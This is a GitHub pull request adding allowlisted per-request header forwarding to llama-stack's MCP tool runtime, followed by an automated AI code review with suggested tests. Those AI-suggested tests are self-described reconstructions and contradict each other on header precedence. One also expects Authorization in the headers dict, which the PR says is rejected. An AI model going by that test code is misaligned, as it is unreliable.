add forward_headers passthrough to remote::model-context-protocol by skamenan7 · Pull Request #2 · skamenan7/llama-stack

skamenan7 · 2026-03-23T22:46:28Z

Note: this branch is stacked on llamastack#5134 (inference + safety passthrough, not yet merged). The only new code here is in the last commit — providers/remote/tool_runtime/model_context_protocol/ and tests/integration/tool_runtime/test_passthrough_mcp.py. For reviews for this PR please focus there; the rest is carried from llamastack#5134 pending merge.

Adds forward_headers and extra_blocked_headers to MCPProviderConfig, wiring per-request header forwarding into list_runtime_tools and invoke_tool. This lets deployers map keys from X-LlamaStack-Provider-Data to outbound HTTP headers so request-scoped auth tokens (MaaS API keys, tenant IDs, etc.) reach the downstream MCP server without the caller passing them via authorization= on every tool call.

Follows the same forward_headers pattern introduced for inference and safety passthrough in llamastack#5134. Authorization-mapped values are split out and passed via the authorization= param — prepare_mcp_headers() rejects Authorization in the headers dict directly, so it flows through the dedicated param instead.

What changed

MCPProviderConfig: added forward_headers: dict[str, str] | None and extra_blocked_headers: list[str] with config-time validation via validate_forward_headers_config() from providers/utils/forward_headers.py
MCPProviderDataValidator: added model_config = ConfigDict(extra="allow") so deployer-defined keys survive Pydantic parsing (key names are operator-configured at deploy time and can't be declared as typed fields)
ModelContextProtocolImpl: new _get_forwarded_headers_and_auth() reads the allowlist from provider data, splits Authorization for the authorization= param, returns non-auth headers separately. Both list_runtime_tools and invoke_tool merge forwarded headers with the legacy mcp_headers URI-keyed path (kept for backward compat). Explicit authorization= from the caller wins over forwarded auth.

Config example:

providers:
  tool_runtime:
  - provider_type: remote::model-context-protocol
    config:
      forward_headers:
        maas_api_token: Authorization   # bare token, "Bearer " prepended by prepare_mcp_headers
        tenant_id: X-Tenant-ID
        team_id: X-Team-ID

Test plan

Unit/integration tests — tests covering config validation, header forwarding, auth splitting, default-deny enforcement, missing-key soft-skip, and wiring through list_runtime_tools and invoke_tool:

uv run pytest tests/integration/tool_runtime/test_passthrough_mcp.py -v

Local testing with mock MCP server — ran a mock MCP server that captures all inbound headers and exposes them at /debug/last-headers. Started llama-stack with the forward_headers config above, then verified via the agent API that:

maas_api_token from X-LlamaStack-Provider-Data arrived as Authorization: Bearer <token> on the downstream server
tenant_id arrived as X-Tenant-ID
Unlisted keys (secret_internal) did not appear in any downstream header (default-deny confirmed)
Requests with missing or no provider data worked without crashing

Note: invoke_tool and list_runtime_tools are internal methods called by the agents layer and not exposed as HTTP endpoints (changed in upstream PRs llamastack#4997 and llamastack#5246), so full e2e requires a model server via the agent API.

Checklist

forward_headers / extra_blocked_headers optional with backward-compatible defaults — configs without them parse correctly
Default-deny: unlisted keys are silently dropped, nothing escapes the allowlist
Three-state config tested: None, empty dict, populated dict
MCPProviderDataValidator uses extra="allow" (intentional — deployer key names can't be pre-declared)
MCPProviderConfig uses extra="forbid"
Reuses shared build_forwarded_headers() and validate_forward_headers_config() from providers/utils/forward_headers.py — no duplication
Existing mcp_headers URI-keyed path preserved for backward compat
No breaking changes

Summary by Sourcery

Add configurable per-request header forwarding support to remote passthrough providers, including MCP tool runtime, inference, and safety, using a shared forward_headers utility with stricter validation and default-deny behavior.

New Features:

Allow MCP remote tool runtime to forward selected request-scoped headers and auth tokens from provider data to downstream MCP servers via forward_headers configuration.
Enable inference and safety passthrough providers to forward whitelisted headers from X-LlamaStack-Provider-Data using a common forward_headers policy and extra_blocked_headers for operator overrides.

Enhancements:

Refine passthrough inference auth handling so the OpenAI client relies solely on composed request headers, avoiding sentinel API keys and ensuring static credentials override forwarded Authorization values.
Harden header forwarding with centralized validation, case-insensitive blocking of security-sensitive and operator-defined headers, value sanitization, and size limits.
Relax provider-data validators for passthrough and MCP so deployer-defined keys are preserved while keeping provider configs strict via extra='forbid'.
Document forward_headers and extra_blocked_headers options for MCP tool runtime, inference passthrough, and safety passthrough providers.

Tests:

Add comprehensive unit tests for the shared forward_headers utilities, passthrough inference adapter behavior, safety passthrough config and headers, and MCP provider config and wiring through list_runtime_tools and invoke_tool.

sourcery-ai · 2026-03-23T22:46:34Z

Reviewer's Guide

Adds configurable per-request header forwarding to the remote model-context-protocol tool runtime, reusing a shared forward_headers utility and aligning MCP behavior with the existing inference/safety passthrough patterns while preserving backward compatibility with legacy mcp_headers and auth handling.

Sequence diagram for MCP tool invocation with forwarded headers

sequenceDiagram
    actor Agent
    participant ModelContextProtocolImpl
    participant ForwardHeadersUtils as ForwardHeadersUtils_build_forwarded_headers
    participant LegacyHeaders as ModelContextProtocolImpl_get_headers_from_request
    participant MCPClient as invoke_mcp_tool
    participant MCPServer as Downstream_MCP_server

    Agent->>ModelContextProtocolImpl: invoke_tool(tool_name, kwargs, authorization?)
    activate ModelContextProtocolImpl

    ModelContextProtocolImpl->>ModelContextProtocolImpl: _get_forwarded_headers_and_auth()
    activate ForwardHeadersUtils
    ModelContextProtocolImpl->>ForwardHeadersUtils: build_forwarded_headers(provider_data, config.forward_headers)
    ForwardHeadersUtils-->>ModelContextProtocolImpl: forwarded_headers
    deactivate ForwardHeadersUtils

    ModelContextProtocolImpl->>ModelContextProtocolImpl: split Authorization from forwarded_headers
    ModelContextProtocolImpl-->>ModelContextProtocolImpl: forwarded_headers_no_auth, forwarded_auth

    ModelContextProtocolImpl->>LegacyHeaders: get_headers_from_request(endpoint)
    activate LegacyHeaders
    LegacyHeaders-->>ModelContextProtocolImpl: legacy_headers (from mcp_headers)
    deactivate LegacyHeaders

    ModelContextProtocolImpl-->>ModelContextProtocolImpl: merged_headers = forwarded_headers_no_auth + legacy_headers
    ModelContextProtocolImpl-->>ModelContextProtocolImpl: effective_auth = authorization param or forwarded_auth

    ModelContextProtocolImpl->>MCPClient: invoke_mcp_tool(endpoint, tool_name, kwargs, headers=merged_headers, authorization=effective_auth)
    activate MCPClient
    MCPClient->>MCPServer: HTTP request with merged_headers and Authorization
    MCPServer-->>MCPClient: HTTP response
    MCPClient-->>ModelContextProtocolImpl: result
    deactivate MCPClient

    ModelContextProtocolImpl-->>Agent: tool result
    deactivate ModelContextProtocolImpl

Sequence diagram for inference passthrough with forwarded headers and API key precedence

sequenceDiagram
    actor Client
    participant InferenceAdapter as PassthroughInferenceAdapter
    participant ForwardHeadersUtils as ForwardHeadersUtils_build_forwarded_headers
    participant OpenAI as AsyncOpenAI_client
    participant Downstream as Downstream_inference_service

    Client->>InferenceAdapter: openai_completion(...)
    activate InferenceAdapter

    InferenceAdapter->>InferenceAdapter: _get_openai_client()

    InferenceAdapter->>InferenceAdapter: _build_request_headers()
    InferenceAdapter->>ForwardHeadersUtils: build_forwarded_headers(provider_data, config.forward_headers)
    activate ForwardHeadersUtils
    ForwardHeadersUtils-->>InferenceAdapter: forwarded_headers
    deactivate ForwardHeadersUtils

    InferenceAdapter->>InferenceAdapter: _get_passthrough_api_key_or_none(provider_data?)
    InferenceAdapter-->>InferenceAdapter: api_key_or_none

    alt static_or_per_request_api_key_present
        InferenceAdapter-->>InferenceAdapter: drop forwarded Authorization variants
        InferenceAdapter-->>InferenceAdapter: headers[Authorization] = Bearer api_key
    end

    InferenceAdapter-->>InferenceAdapter: request_headers

    InferenceAdapter->>OpenAI: create AsyncOpenAI(base_url, api_key="", default_headers=request_headers)
    activate OpenAI

    InferenceAdapter->>OpenAI: chat.completions.create(...)
    OpenAI->>Downstream: HTTP request with request_headers
    Downstream-->>OpenAI: HTTP response
    OpenAI-->>InferenceAdapter: completion
    deactivate OpenAI

    InferenceAdapter-->>Client: completion
    deactivate InferenceAdapter

Class diagram for forward_headers configs and utilities

classDiagram
    class MCPProviderDataValidator {
        +ConfigDict model_config
        +dict~str, dict~str, str~~ mcp_headers
    }

    class MCPProviderConfig {
        +ConfigDict model_config
        +dict~str, str~ forward_headers
        +list~str~ extra_blocked_headers
        +sample_run_config(forward_headers, extra_blocked_headers, _kwargs) dict~str, Any~
        +validate_forward_headers() MCPProviderConfig
    }

    class PassthroughImplConfig {
        +HttpUrl base_url
        +SecretStr auth_credential
        +dict~str, str~ forward_headers
        +list~str~ extra_blocked_headers
        +validate_forward_headers() PassthroughImplConfig
        +sample_run_config(base_url, api_key, forward_headers, extra_blocked_headers, kwargs) dict~str, Any~
    }

    class PassthroughProviderDataValidator_inference {
        +ConfigDict model_config
        +HttpUrl passthrough_url
        +SecretStr passthrough_api_key
    }

    class PassthroughSafetyConfig {
        +HttpUrl base_url
        +SecretStr api_key
        +dict~str, str~ forward_headers
        +list~str~ extra_blocked_headers
        +validate_forward_headers() PassthroughSafetyConfig
        +sample_run_config(base_url, api_key, forward_headers, extra_blocked_headers, kwargs) dict~str, Any~
    }

    class PassthroughProviderDataValidator_safety {
        +ConfigDict model_config
        +SecretStr passthrough_api_key
    }

    class PassthroughInferenceAdapter {
        +PassthroughImplConfig config
        +initialize() None
        +_get_openai_client() AsyncOpenAI
        +_build_request_headers() dict~str, str~
        +_get_passthrough_api_key_or_none(provider_data) str
        +_get_passthrough_url() str
    }

    class PassthroughSafetyAdapter {
        +PassthroughSafetyConfig config
        +_get_api_key() str
        +_build_forward_headers() dict~str, str~
        +_build_request_headers() dict~str, str~
    }

    class ModelContextProtocolImpl {
        +MCPProviderConfig config
        +_get_forwarded_headers_and_auth() tuple~dict~str, str~, str~
        +get_headers_from_request(mcp_endpoint_uri) dict~str, str~
        +list_runtime_tools(mcp_endpoint, authorization) ListToolDefsResponse
        +invoke_tool(tool_name, kwargs, authorization) Any
    }

    class ForwardHeadersUtils {
        +CORE_BLOCKED_FORWARD_HEADERS : frozenset~str~
        +normalize_header_name(header_name) str
        +is_valid_header_name(header_name) bool
        +get_effective_blocked_forward_headers(extra_blocked_headers) frozenset~str~
        +validate_forward_headers_config(forward_headers, extra_blocked_headers) None
        +build_forwarded_headers(provider_data, forward_headers) dict~str, str~
    }

    MCPProviderConfig ..> ForwardHeadersUtils : uses
    PassthroughImplConfig ..> ForwardHeadersUtils : uses
    PassthroughSafetyConfig ..> ForwardHeadersUtils : uses

    PassthroughInferenceAdapter --> PassthroughImplConfig : has
    PassthroughSafetyAdapter --> PassthroughSafetyConfig : has
    ModelContextProtocolImpl --> MCPProviderConfig : has

    PassthroughInferenceAdapter ..> PassthroughProviderDataValidator_inference : reads provider_data
    PassthroughSafetyAdapter ..> PassthroughProviderDataValidator_safety : reads provider_data
    ModelContextProtocolImpl ..> MCPProviderDataValidator : reads provider_data

    PassthroughImplConfig --|> RemoteInferenceProviderConfig
    PassthroughSafetyAdapter --|> Safety
    PassthroughInferenceAdapter --|> Inference
    ModelContextProtocolImpl --|> NeedsRequestProviderData

File-Level Changes

Change	Details	Files
Introduce shared forward_headers utility and apply it across inference, safety, and MCP providers for consistent, policy-enforced header forwarding.	Added providers/utils/forward_headers.py with validation helpers, blocked-header policy, header-name normalization, and safe header-value extraction/sanitization. Refactored inference and safety passthrough adapters to use build_forwarded_headers() instead of bespoke logic, including case-insensitive coalescing of Authorization variants and max-size enforcement. Centralized forward_headers validation via validate_forward_headers_config() and get_effective_blocked_forward_headers(), replacing ad-hoc blocked-header constants in safety config.	`src/llama_stack/providers/utils/forward_headers.py` `src/llama_stack/providers/remote/inference/passthrough/passthrough.py` `src/llama_stack/providers/remote/safety/passthrough/passthrough.py` `src/llama_stack/providers/remote/safety/passthrough/config.py` `src/llama_stack/providers/remote/inference/passthrough/config.py` `tests/unit/providers/safety/passthrough/test_headers.py` `tests/unit/providers/safety/passthrough/test_config.py` `tests/unit/providers/inference/test_passthrough_forward_headers.py`
Add forward_headers and extra_blocked_headers support to the MCP tool runtime configuration and provider data handling, including auth splitting and legacy-path merging.	Extended MCPProviderConfig with forward_headers and extra_blocked_headers fields plus a model_validator that delegates to validate_forward_headers_config(), and made config extra="forbid". Updated MCPProviderDataValidator to use extra="allow" so deployer-defined provider-data keys survive parsing alongside legacy mcp_headers. Implemented ModelContextProtocolToolRuntimeImpl._get_forwarded_headers_and_auth() to build forwarded headers from provider data, split Authorization into a separate auth token, warn on configured-but-missing keys, and return (non_auth_headers, auth_token). Updated list_runtime_tools and invoke_tool to merge forwarded headers with legacy mcp_headers, and to prefer explicit authorization= over any forwarded auth token. Added integration tests that validate MCPProviderConfig, provider-data behavior, and list_runtime_tools/invoke_tool wiring for header forwarding and auth precedence.	`src/llama_stack/providers/remote/tool_runtime/model_context_protocol/config.py` `src/llama_stack/providers/remote/tool_runtime/model_context_protocol/model_context_protocol.py` `tests/integration/tool_runtime/test_passthrough_mcp.py`
Tighten and document passthrough inference and safety configs to support header forwarding and more flexible per-request auth while maintaining backward compatibility.	Extended PassthroughImplConfig and PassthroughSafetyConfig with forward_headers and extra_blocked_headers, plus model_validator-based validation using validate_forward_headers_config(). Adjusted sample_run_config helpers and docs to expose the new fields, default api_key to an empty string when unset, and propagate extra_blocked_headers into sample configs. Changed PassthroughProviderDataValidator (inference) and PassthroughProviderDataValidator (safety) to allow extra keys so forward_headers-mapped provider data is preserved, and made passthrough_url/passthrough_api_key optional. Reworked PassthroughInferenceAdapter to build outbound headers via _build_request_headers(), prefer static auth_credential over provider-data API key, fall back to provider-data API key if static is empty/None, and avoid sending a spurious Authorization from the OpenAI SDK by setting api_key="" when relying solely on headers. Updated PassthroughSafetyAdapter header-building logic to reuse build_forwarded_headers(), log when forward_headers is configured but yields no matches, and ensure static api_key overwrites any forwarded Authorization in a case-insensitive way. Added/updated unit tests to cover config validation, provider-data preservation, header assembly behavior (including precedence and case-collision), size and character sanitization, and ContextVar isolation between concurrent requests.	`src/llama_stack/providers/remote/inference/passthrough/config.py` `src/llama_stack/providers/remote/inference/passthrough/__init__.py` `src/llama_stack/providers/remote/inference/passthrough/passthrough.py` `src/llama_stack/providers/remote/safety/passthrough/config.py` `src/llama_stack/providers/remote/safety/passthrough/passthrough.py` `docs/docs/providers/inference/remote_passthrough.mdx` `docs/docs/providers/safety/remote_passthrough.mdx` `tests/unit/providers/inference/test_passthrough_forward_headers.py` `tests/unit/providers/safety/passthrough/test_headers.py` `tests/unit/providers/safety/passthrough/test_config.py`
Update documentation for the remote MCP and passthrough providers to describe the new forward_headers and extra_blocked_headers configuration options.	Extended remote::model-context-protocol provider docs with a configuration table describing forward_headers and extra_blocked_headers semantics and security guarantees. Updated inference and safety remote_passthrough docs to list forward_headers/extra_blocked_headers in the config tables and to clarify behavior for Authorization and security-sensitive headers. Adjusted the inference remote_passthrough sample config to allow an empty PASSTHROUGH_API_KEY env value (":=") to support header-only auth setups.	`docs/docs/providers/tool_runtime/remote_model-context-protocol.mdx` `docs/docs/providers/inference/remote_passthrough.mdx` `docs/docs/providers/safety/remote_passthrough.mdx`

Tips and commands

Interacting with Sourcery

Trigger a new review: Comment @sourcery-ai review on the pull request.
Continue discussions: Reply directly to Sourcery's review comments.
Generate a GitHub issue from a review comment: Ask Sourcery to create an
issue from a review comment by replying to it. You can also reply to a
review comment with @sourcery-ai issue to create an issue from it.
Generate a pull request title: Write @sourcery-ai anywhere in the pull
request title to generate a title at any time. You can also comment
@sourcery-ai title on the pull request to (re-)generate the title at any time.
Generate a pull request summary: Write @sourcery-ai summary anywhere in
the pull request body to generate a PR summary at any time exactly where you
want it. You can also comment @sourcery-ai summary on the pull request to
(re-)generate the summary at any time.
Generate reviewer's guide: Comment @sourcery-ai guide on the pull
request to (re-)generate the reviewer's guide at any time.
Resolve all Sourcery comments: Comment @sourcery-ai resolve on the
pull request to resolve all Sourcery comments. Useful if you've already
addressed all the comments and don't want to see them anymore.
Dismiss all Sourcery reviews: Comment @sourcery-ai dismiss on the pull
request to dismiss all existing Sourcery reviews. Especially useful if you
want to start fresh with a new review - don't forget to comment
@sourcery-ai review to trigger a new review!

Customizing Your Experience

Access your dashboard to:

Enable or disable review features such as the Sourcery-generated pull request
summary, the reviewer's guide, and others.
Change the review language.
Add, remove or edit custom review instructions.
Adjust other review settings.

Getting Help

Contact our support team for questions or feedback.
Visit our documentation for detailed guides and information.
Keep in touch with the Sourcery team by following us on X/Twitter, LinkedIn or GitHub.

sourcery-ai

Hey - I've found 2 issues, and left some high level feedback:

The warning about forward_headers being configured but yielding no matching provider-data keys is now duplicated in multiple adapters (inference, safety, MCP); consider centralizing this into a small helper around build_forwarded_headers so the log message and behavior stay consistent in one place.
In build_forwarded_headers, you recompute len(sanitized.encode()) when logging the oversize warning; you could compute it once into a local variable to avoid double encoding and make the intent clearer.

Prompt for AI Agents

Please address the comments from this code review:

## Overall Comments
- The warning about `forward_headers` being configured but yielding no matching provider-data keys is now duplicated in multiple adapters (`inference`, `safety`, MCP); consider centralizing this into a small helper around `build_forwarded_headers` so the log message and behavior stay consistent in one place.
- In `build_forwarded_headers`, you recompute `len(sanitized.encode())` when logging the oversize warning; you could compute it once into a local variable to avoid double encoding and make the intent clearer.

## Individual Comments

### Comment 1
<location path="tests/integration/tool_runtime/test_passthrough_mcp.py" line_range="183" />
<code_context>
+# ---------------------------------------------------------------------------
+
+
+class TestListRuntimeToolsWiring:
+    async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch):
+        """forward_headers config causes headers to be passed to list_mcp_tools."""
</code_context>
<issue_to_address>
**suggestion (testing):** Missing tests for interaction between forward_headers and legacy mcp_headers merging in list_runtime_tools

These tests only cover the forwarded-headers path and the no-headers case. Please add a test that:

- Sets `mcp_headers` in the provider data for an endpoint.
- Configures `forward_headers` (e.g. `"tid" -> "X-Tenant-ID"`).
- Asserts that `list_runtime_tools` passes a merged headers dict to `list_mcp_tools`, with the correct precedence between legacy and forwarded headers.

This will validate the backward-compatible path and ensure the new merge logic doesn’t drop or wrongly override legacy headers.

Suggested implementation:

```python
class TestListRuntimeToolsWiring:
    async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch):
        """forward_headers config causes headers to be passed to list_mcp_tools."""
        from llama_stack_api import URL

        impl = _make_impl(forward_headers={"tid": "X-Tenant-ID"})
        impl.get_request_provider_data = MagicMock(
            return_value=_make_provider_data(tid="acme")
        )  # type: ignore[method-assign]

        captured: dict[str, Any] = {}

        async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
            captured["headers"] = headers
            captured["authorization"] = authorization

        # Wire our fake into the runtime impl
        monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)

        # Exercise list_runtime_tools; this should compute forwarded headers
        await impl.list_runtime_tools(URL("https://example.com/mcp"))

        # We only care that the forwarded header mapping is honored
        assert captured["headers"] == {"X-Tenant-ID": "acme"}

    async def test_forwarded_and_legacy_mcp_headers_are_merged(self, monkeypatch):
        """forward_headers and legacy mcp_headers are merged with legacy taking precedence."""
        from llama_stack_api import URL

        # Map request headers -> MCP headers
        impl = _make_impl(
            forward_headers={
                "tid": "X-Tenant-ID",
                "org": "X-Org-ID",
            }
        )

        # Legacy MCP headers configured on the provider
        legacy_mcp_headers = {
            "X-Tenant-ID": "legacy-tenant",  # should win over forwarded value
            "X-Static": "static-value",
        }

        # Request-scoped headers (available for forwarding)
        impl.get_request_provider_data = MagicMock(
            return_value=_make_provider_data(
                tid="forwarded-tenant",
                org="acme-org",
                mcp_headers=legacy_mcp_headers,
            )
        )  # type: ignore[method-assign]

        captured: dict[str, Any] = {}

        async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
            captured["headers"] = headers
            captured["authorization"] = authorization

        # Wire our fake into the runtime impl
        monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)

        # Exercise list_runtime_tools; this should merge forwarded and legacy headers
        await impl.list_runtime_tools(URL("https://example.com/mcp"))

        # Expected behavior:
        # - Non-overlapping forwarded headers are included.
        # - Overlapping keys are resolved in favor of legacy mcp_headers (backward compatible).
        assert captured["headers"] == {
            "X-Tenant-ID": "legacy-tenant",  # legacy wins
            "X-Static": "static-value",
            "X-Org-ID": "acme-org",  # only comes from forwarded headers
        }

```

I had to reconstruct parts of the existing `test_forwarded_headers_passed_to_list_mcp_tools` body and the wiring to `impl.runtime.list_mcp_tools` / `impl.list_runtime_tools` based on the incomplete snippet.

To integrate this cleanly, please:
1. Align the use of `URL("https://example.com/mcp")` and the `impl.list_runtime_tools(...)` call with how other tests in this file currently invoke `list_runtime_tools` (e.g., if they pass an endpoint ID or different argument shape, mirror that instead).
2. Ensure `_make_provider_data(...)` actually accepts an `mcp_headers` keyword argument and that it places those headers where `list_runtime_tools` expects to find legacy MCP headers. If the shape differs (e.g., nested under a specific endpoint key), adapt the `return_value` accordingly.
3. If `impl.runtime.list_mcp_tools` lives under a different attribute path or module in your codebase, adjust the `monkeypatch.setattr(...)` calls to match the actual location.
4. If your existing `test_forwarded_headers_passed_to_list_mcp_tools` already has more assertions or setup not visible in the snippet, merge those back into the reconstructed body above so no coverage is lost.
</issue_to_address>

### Comment 2
<location path="tests/integration/tool_runtime/test_passthrough_mcp.py" line_range="263" />
<code_context>
+# ---------------------------------------------------------------------------
+
+
+class TestInvokeToolWiring:
+    async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch):
+        """forward_headers config causes headers to be passed to invoke_mcp_tool."""
</code_context>
<issue_to_address>
**suggestion (testing):** Consider adding a test that legacy mcp_headers are still honored in invoke_tool alongside forwarded headers

Right now this only exercises the `forwarded_headers` path. Please add a test where `provider_data.mcp_headers` is set for the tool endpoint and `forward_headers` also injects a header, then assert that `invoke_mcp_tool` sees both and that the intended precedence between them is preserved. This will cover the backward-compatible headers behavior in `invoke_tool`.

Suggested implementation:

```python
# ---------------------------------------------------------------------------
# invoke_tool wiring tests
# ---------------------------------------------------------------------------


class TestInvokeToolWiring:
    async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch):
        """forward_headers config causes headers to be passed to invoke_mcp_tool."""
        impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})
        impl.get_request_provider_data = MagicMock(
            return_value=_make_provider_data(tid="acme", tok="my-token")
        )  # type: ignore[method-assign]

        # mock tool_store
        fake_tool = MagicMock()
        fake_tool.metadata = {"endpoint": "http://mcp-server:8080/sse"}
        impl.tool_store = AsyncMock()
        impl.tool_store.get_tool.return_value = fake_tool

        captured: dict[str, Any] = {}

        async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any:  # pragma: no cover - trivial passthrough
            captured["headers"] = kwargs.get("headers")

        impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)

        await impl.invoke_tool(
            tool_name="some-tool",
            arguments={},
            metadata={},
        )

        assert captured["headers"] == {
            "X-Tenant-ID": "acme",
            "Authorization": "my-token",
        }

    async def test_forwarded_and_legacy_mcp_headers_are_merged_and_forwarded_headers_take_precedence(
        self,
        monkeypatch: Any,
    ) -> None:
        """Both legacy mcp_headers and forward_headers are honored; forward_headers take precedence."""
        impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})

        endpoint = "http://mcp-server:8080/sse"

        # Legacy mcp_headers for this endpoint
        legacy_mcp_headers = {
            "Authorization": "legacy-token",
            "X-Legacy": "legacy-value",
        }

        # Request-scoped headers that will be forwarded according to forward_headers
        request_headers = {
            "tid": "acme",
            "tok": "forward-token",
        }

        provider_data = SimpleNamespace(
            headers=request_headers,
            mcp_headers={endpoint: legacy_mcp_headers},
        )
        impl.get_request_provider_data = MagicMock(return_value=provider_data)  # type: ignore[method-assign]

        # mock tool_store
        fake_tool = MagicMock()
        fake_tool.metadata = {"endpoint": endpoint}
        impl.tool_store = AsyncMock()
        impl.tool_store.get_tool.return_value = fake_tool

        captured: dict[str, Any] = {}

        async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any:  # pragma: no cover - trivial passthrough
            captured["headers"] = kwargs.get("headers")

        impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)

        await impl.invoke_tool(
            tool_name="some-tool",
            arguments={},
            metadata={},
        )

        # Expect:
        # - legacy mcp_headers are present
        # - forwarded headers are added
        # - for overlapping keys (e.g. Authorization) forwarded headers win
        assert captured["headers"] == {
            "X-Tenant-ID": "acme",          # from forward_headers mapping tid -> X-Tenant-ID
            "Authorization": "forward-token",  # forwarded value overrides legacy mcp_headers.Authorization
            "X-Legacy": "legacy-value",     # preserved from legacy mcp_headers
        }

```

1. Ensure `SimpleNamespace` is imported at the top of `tests/integration/tool_runtime/test_passthrough_mcp.py`, e.g.:
   `from types import SimpleNamespace`.
2. If `impl.invoke_tool` uses different parameter names than `tool_name`, `arguments`, and `metadata`, adjust the call sites in both tests to match the actual signature used elsewhere in this test file.
3. If `get_request_provider_data` expects attributes other than `headers` and `mcp_headers`, extend the `SimpleNamespace` in the new test with those attributes as needed.
</issue_to_address>

Sourcery is free for open source - if you like our reviews please consider sharing them ✨

_{Help me be more useful! Please click 👍 or 👎 on each comment and I'll use the feedback to improve your reviews.}

sourcery-ai · 2026-03-23T22:48:32Z

tests/integration/tool_runtime/test_passthrough_mcp.py

+# ---------------------------------------------------------------------------
+
+
+class TestListRuntimeToolsWiring:


suggestion (testing): Missing tests for interaction between forward_headers and legacy mcp_headers merging in list_runtime_tools

These tests only cover the forwarded-headers path and the no-headers case. Please add a test that:

Sets mcp_headers in the provider data for an endpoint.

Configures forward_headers (e.g. "tid" -> "X-Tenant-ID").

Asserts that list_runtime_tools passes a merged headers dict to list_mcp_tools, with the correct precedence between legacy and forwarded headers.

This will validate the backward-compatible path and ensure the new merge logic doesn’t drop or wrongly override legacy headers.

Suggested implementation:

class TestListRuntimeToolsWiring: async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch): """forward_headers config causes headers to be passed to list_mcp_tools.""" from llama_stack_api import URL impl = _make_impl(forward_headers={"tid": "X-Tenant-ID"}) impl.get_request_provider_data = MagicMock( return_value=_make_provider_data(tid="acme") ) # type: ignore[method-assign] captured: dict[str, Any] = {} async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_): captured["headers"] = headers captured["authorization"] = authorization # Wire our fake into the runtime impl monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools) # Exercise list_runtime_tools; this should compute forwarded headers await impl.list_runtime_tools(URL("https://example.com/mcp")) # We only care that the forwarded header mapping is honored assert captured["headers"] == {"X-Tenant-ID": "acme"} async def test_forwarded_and_legacy_mcp_headers_are_merged(self, monkeypatch): """forward_headers and legacy mcp_headers are merged with legacy taking precedence.""" from llama_stack_api import URL # Map request headers -> MCP headers impl = _make_impl( forward_headers={ "tid": "X-Tenant-ID", "org": "X-Org-ID", } ) # Legacy MCP headers configured on the provider legacy_mcp_headers = { "X-Tenant-ID": "legacy-tenant", # should win over forwarded value "X-Static": "static-value", } # Request-scoped headers (available for forwarding) impl.get_request_provider_data = MagicMock( return_value=_make_provider_data( tid="forwarded-tenant", org="acme-org", mcp_headers=legacy_mcp_headers, ) ) # type: ignore[method-assign] captured: dict[str, Any] = {} async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_): captured["headers"] = headers captured["authorization"] = authorization # Wire our fake into the runtime impl monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools) # Exercise list_runtime_tools; this should merge forwarded and legacy headers await impl.list_runtime_tools(URL("https://example.com/mcp")) # Expected behavior: # - Non-overlapping forwarded headers are included. # - Overlapping keys are resolved in favor of legacy mcp_headers (backward compatible). assert captured["headers"] == { "X-Tenant-ID": "legacy-tenant", # legacy wins "X-Static": "static-value", "X-Org-ID": "acme-org", # only comes from forwarded headers }

I had to reconstruct parts of the existing test_forwarded_headers_passed_to_list_mcp_tools body and the wiring to impl.runtime.list_mcp_tools / impl.list_runtime_tools based on the incomplete snippet.

To integrate this cleanly, please:

Align the use of URL("https://example.com/mcp") and the impl.list_runtime_tools(...) call with how other tests in this file currently invoke list_runtime_tools (e.g., if they pass an endpoint ID or different argument shape, mirror that instead).

Ensure _make_provider_data(...) actually accepts an mcp_headers keyword argument and that it places those headers where list_runtime_tools expects to find legacy MCP headers. If the shape differs (e.g., nested under a specific endpoint key), adapt the return_value accordingly.

If impl.runtime.list_mcp_tools lives under a different attribute path or module in your codebase, adjust the monkeypatch.setattr(...) calls to match the actual location.

If your existing test_forwarded_headers_passed_to_list_mcp_tools already has more assertions or setup not visible in the snippet, merge those back into the reconstructed body above so no coverage is lost.

sourcery-ai · 2026-03-23T22:48:33Z

tests/integration/tool_runtime/test_passthrough_mcp.py

+# ---------------------------------------------------------------------------
+
+
+class TestInvokeToolWiring:


suggestion (testing): Consider adding a test that legacy mcp_headers are still honored in invoke_tool alongside forwarded headers

Right now this only exercises the forwarded_headers path. Please add a test where provider_data.mcp_headers is set for the tool endpoint and forward_headers also injects a header, then assert that invoke_mcp_tool sees both and that the intended precedence between them is preserved. This will cover the backward-compatible headers behavior in invoke_tool.

Suggested implementation:

# --------------------------------------------------------------------------- # invoke_tool wiring tests # --------------------------------------------------------------------------- class TestInvokeToolWiring: async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch): """forward_headers config causes headers to be passed to invoke_mcp_tool.""" impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"}) impl.get_request_provider_data = MagicMock( return_value=_make_provider_data(tid="acme", tok="my-token") ) # type: ignore[method-assign] # mock tool_store fake_tool = MagicMock() fake_tool.metadata = {"endpoint": "http://mcp-server:8080/sse"} impl.tool_store = AsyncMock() impl.tool_store.get_tool.return_value = fake_tool captured: dict[str, Any] = {} async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any: # pragma: no cover - trivial passthrough captured["headers"] = kwargs.get("headers") impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool) await impl.invoke_tool( tool_name="some-tool", arguments={}, metadata={}, ) assert captured["headers"] == { "X-Tenant-ID": "acme", "Authorization": "my-token", } async def 